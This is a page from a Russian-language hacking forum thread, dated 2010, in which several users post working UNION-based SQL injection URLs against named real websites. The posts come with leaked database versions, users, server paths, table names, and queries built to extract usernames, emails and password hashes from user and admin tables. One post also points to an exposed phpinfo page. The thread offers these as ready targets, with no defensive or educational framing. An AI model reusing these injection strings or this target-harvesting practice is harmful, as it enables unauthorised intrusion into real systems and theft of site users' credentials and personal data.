ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12341  
Старый 12.06.2010, 05:20
Аватар для qq6ka
qq6ka
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме:
167126

Репутация: 55
По умолчанию

PR 6, http://www.goldenpaints.com

Код:
http://www.goldenpaints.com/artist/wap/artist.php?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x2a,email_address,username,password,user_level),14,15,16,17,18,19,20,21+FROM+wap.users--
------------------

root@localhost*4.1.22*gardexru

Код HTML:
http://www.gardex.ru/catalog/series.php?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x2a,user(),version(),database()),15,16,17,18,19,20,21,22,23--

Последний раз редактировалось qq6ka; 12.06.2010 в 12:25..
 
Ответить с цитированием

  #12342  
Старый 12.06.2010, 13:05
Аватар для jecka3000
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

Код:
http://www.academiaga.ru/index.php?id=-53+union+select+concat(version(),0x20,database(),0x20,user()),2,3,4--
4.0.27-log
aga_www
aga_www@195.242.3.251

Код:
http://www.ophthalmo.ru/rus/index.php?id=-565+union+select+1,2,concat(login,0x20,password),4+from+sm_users+limit+1,1--
Код:
http://peoplephoto.ru/foto/index.php?id=-1156+union+select+concat(version(),0x20,database(),0x20,user())--
4.0.27-log
peoplep0_catalogphoto
peoplep0_qweeert@localhost
 
Ответить с цитированием

  #12343  
Старый 12.06.2010, 14:39
Аватар для Bramin
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199

Репутация: 127
Отправить сообщение для Bramin с помощью ICQ
По умолчанию

PR5

http://www.itmaasia.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(0 x0b,username,0x3a3a,password),12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27+from+tb_admin--


PR 3
4.0.27-log
mona-liza
mona-liza@zvm17.host.ru


http://www.mona-liza.com/act.php?id=-4+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5--

Последний раз редактировалось Bramin; 12.06.2010 в 15:23..
 
Ответить с цитированием

  #12344  
Старый 12.06.2010, 18:35
Аватар для BlackFan
BlackFan
Новичок
Регистрация: 03.01.2009
Сообщений: 27
Провел на форуме:
367442

Репутация: 41
По умолчанию

Код:
http://interier-portal.ru/catalog.php?enter=firms&id=-1+union+select+group_concat(0x3C62723E,concat_ws(0x3a,username,user_password))+from+phpbb_users
root@localhost:interier:4.1.25
 
Ответить с цитированием

  #12345  
Старый 12.06.2010, 19:46
Аватар для pinch
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

http://blindcanadians.ca/press_releases//index.php?BriefID=-50+union+Select+1,2,table_name,4+from+information_ schema.tABLES--
 
Ответить с цитированием

  #12346  
Старый 12.06.2010, 20:32
Аватар для CyberHunter
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Код:
http://www.saltwatercharterswa.com.au/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28user%28%29,database%28%29,version%28%29%29,2,3,4+--+
Version: 5.0.51a-24
User: myswcw1000@ws-shared
Database: netswcwa_saltwatercharterswa_com_au
 
Ответить с цитированием

  #12347  
Старый 13.06.2010, 02:58
Аватар для b82a
b82a
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
Провел на форуме:
619439

Репутация: 127
Отправить сообщение для b82a с помощью ICQ
По умолчанию

Код:
http://www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2&region_id=&pais_codigo=-1+UNION+SELECT+1,version(),3,4,5--+
base: eurotur
file_priv: Y
basedir: /usr/
user: apache@localhost
os: suse-linux
tmpdir: /var/lib/mysql/.tmp/
ver: 5.0.26
datadir: /var/lib/mysql/

Последний раз редактировалось b82a; 14.06.2010 в 01:57..
 
Ответить с цитированием

  #12348  
Старый 13.06.2010, 04:39
Аватар для total90
total90
Участник форума
Регистрация: 30.09.2009
Сообщений: 148
Провел на форуме:
11581319

Репутация: 241
Отправить сообщение для total90 с помощью ICQ
По умолчанию

Код:
http://www.neorganika.ru/out.php?gid=-22+union+select+1,2,concat_ws(0x3a,user(),version(),database(),@@version_compile_os,@@tmpdir,@@datadir),4--&razdel=0
user: viziter@localhost
database: dbng
version: 5.0.45
version_compile_os: redhat-linux-gnu

PR2
Вывод в тайтле.

tables:
Код:
brend
dop
firms
jobs
konsalt
news
pdf
picture
prob
quest
ripit
sales
sizes
stat
subscribe
svoistva
tabl
tabletype
texts
title
types
userquest
userquest columns:
Код:
idu
fio
email
password
Код:
http://www.neorganika.ru/out.php?gid=-22+union+select+1,2,concat_ws(0x3a,email,password),4+from+userquest--&razdel=0

Код:
http://www.newsarama.com/php/multimedia/album.php?gid=-780+union+select+1,2,concat_ws(0x3a,user(),database(),version(),@@version_compile_os,@@tmpdir,@@datadir,@@basedir),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
user: cms_user@10.7.0.241
database: publish_new2
version: 5.0.45-log
version_compile_os: redhat-linux-gnu
PR7
 
Ответить с цитированием

  #12349  
Старый 13.06.2010, 04:46
Аватар для qq6ka
qq6ka
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме:
167126

Репутация: 55
По умолчанию

version(),user(),database() = 5.0.60,avk@localhost,avk

Код:
http://www.senpolia.org.ua/view.php?uid=-1+union+select+1,2,3,version(),5,user(),7,8,database()--
Читает файлы.

===============

einrichtungsbeispiele.de

Код:
http://www.einrichtungsbeispiele.de/index.php?uid=13343&show=blog&blogid=-1+union+select+1,2,concat_ws(0x2a,us_vorname,us_name,us_email,us_passwort),4,5,6,7,8,9,10,11,12,13,14+FROM+user--

Последний раз редактировалось qq6ka; 13.06.2010 в 06:05..
 
Ответить с цитированием

  #12350  
Старый 13.06.2010, 15:03
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.adrvest.ro/index.php?page=articol&aid=-455+union+select+1,2,3,4,5,group_concat(username,c har(58),password),7,8,9,10,11,12,13+from+adr_admin s--

+ phpinfo

http://www.adrvest.ro/test/info.php

PR-5

Последний раз редактировалось Konqi; 13.06.2010 в 15:07..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ